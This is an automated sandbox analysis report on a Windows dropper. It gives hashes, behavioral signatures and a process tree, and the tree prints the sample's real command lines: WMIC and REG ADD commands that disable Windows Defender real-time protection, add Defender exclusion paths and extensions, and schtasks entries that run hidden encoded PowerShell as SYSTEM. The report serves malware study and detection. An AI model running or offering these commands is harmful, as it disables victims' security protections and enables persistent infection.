Analysis

  • max time kernel
    230s
  • max time network
    231s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    04/07/2024, 22:38

General

  • Target

    79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe

  • Size

    7.3MB

  • MD5

    9b4d40d862a5b8fc72c6551f44b4bf09

  • SHA1

    1f1585afb8d3c85893d2ab77f84419776a1291b9

  • SHA256

    79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17

  • SHA512

    8ca4799f202f7a3093e5951b911971a586731b18b8c2a3ab166d5306e37e89aa511aad9cf8ec1703c8777a4ff4f43ec6f68997f84eba7993cd1958dc0627db45

  • SSDEEP

    196608:91OUTxStjKgL80gHQBsGOD9vtGQo0ba/4a6beuy:3OUFSjKWgxWQo0c4a6yuy

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 24 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 45 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe
    "C:\Users\Admin\AppData\Local\Temp\79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2456
    • C:\Users\Admin\AppData\Local\Temp\7zS8B8.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2084
      • C:\Users\Admin\AppData\Local\Temp\7zSB56.tmp\Install.exe
        .\Install.exe /GdidIh "385137" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3044
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2836
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2896
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2912
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2536
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bBfKaGDnIKdTdJZScE" /SC once /ST 22:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\wtkwQueHWyOnbrX\YshyKtE.exe\" pa /SKdidZN 385137 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:1728
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 504
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1488
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {F3818936-48E2-4755-ABA5-4BDBC9ADCF92} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\wtkwQueHWyOnbrX\YshyKtE.exe
      C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\wtkwQueHWyOnbrX\YshyKtE.exe pa /SKdidZN 385137 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2868
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "grFQvZZrs" /SC once /ST 10:18:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1336
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "grFQvZZrs"
        3⤵
          PID:1308
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "grFQvZZrs"
          3⤵
            PID:1828
          • C:\Windows\SysWOW64\cmd.exe
            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            3⤵
              PID:2152
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:1348
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
              3⤵
                PID:2480
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:2124
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "glgqgBUWi" /SC once /ST 18:34:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1776
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "glgqgBUWi"
                3⤵
                  PID:1552
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /DELETE /F /TN "glgqgBUWi"
                  3⤵
                    PID:1724
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                    3⤵
                      PID:1576
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                        4⤵
                          PID:1600
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3024
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                              6⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2372
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:32
                        3⤵
                          PID:2728
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:32
                            4⤵
                            • Windows security bypass
                            PID:2336
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:64
                          3⤵
                            PID:1876
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:64
                              4⤵
                              • Windows security bypass
                              PID:2136
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:32
                            3⤵
                              PID:2668
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:32
                                4⤵
                                  PID:2580
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                  PID:2604
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                      PID:2572
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C copy nul "C:\Windows\Temp\XwIFwyvoUqntekhn\ehXUouLk\jDVXKsetyQtKTSoA.wsf"
                                    3⤵
                                      PID:2536
                                    • C:\Windows\SysWOW64\wscript.exe
                                      wscript "C:\Windows\Temp\XwIFwyvoUqntekhn\ehXUouLk\jDVXKsetyQtKTSoA.wsf"
                                      3⤵
                                      • Modifies data under HKEY_USERS
                                      PID:2748
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2752
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1584
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:3036
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:396
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2872
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2892
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2924
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:3056
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2164
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1636
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\evUSZSaqPkAEukVB" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1392
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\evUSZSaqPkAEukVB" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1856
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1256
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1308
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1844
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2984
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1944
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2340
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                          PID:1480
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                            PID:380
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:1476
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:2548
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:2976
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:332
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:1792
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                        PID:2260
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                          PID:2124
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:2392
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\evUSZSaqPkAEukVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:1328
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\evUSZSaqPkAEukVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:2208
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:764
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2224
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:1096
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                        PID:376
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:2304
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:64
                                                                          4⤵
                                                                            PID:1676
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gVQmISyna" /SC once /ST 13:14:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2400
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gVQmISyna"
                                                                          3⤵
                                                                            PID:2816
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gVQmISyna"
                                                                            3⤵
                                                                              PID:2556
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                              3⤵
                                                                                PID:2536
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                  4⤵
                                                                                    PID:2828
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                  3⤵
                                                                                    PID:2248
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                      4⤵
                                                                                        PID:1532
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /CREATE /TN "QVuDljbAZykxnpoWI" /SC once /ST 07:18:32 /RU "SYSTEM" /TR "\"C:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\ooklDxj.exe\" Cc /uSIedidyt 385137 /S" /V1 /F
                                                                                      3⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:3048
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /run /I /tn "QVuDljbAZykxnpoWI"
                                                                                      3⤵
                                                                                        PID:2320
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 480
                                                                                        3⤵
                                                                                        • Loads dropped DLL
                                                                                        • Program crash
                                                                                        PID:2884
                                                                                    • C:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\ooklDxj.exe
                                                                                      C:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\ooklDxj.exe Cc /uSIedidyt 385137 /S
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops Chrome extension
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:396
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bBfKaGDnIKdTdJZScE"
                                                                                        3⤵
                                                                                          PID:2932
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:1556
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                                PID:892
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:1752
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2804
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        7⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2100
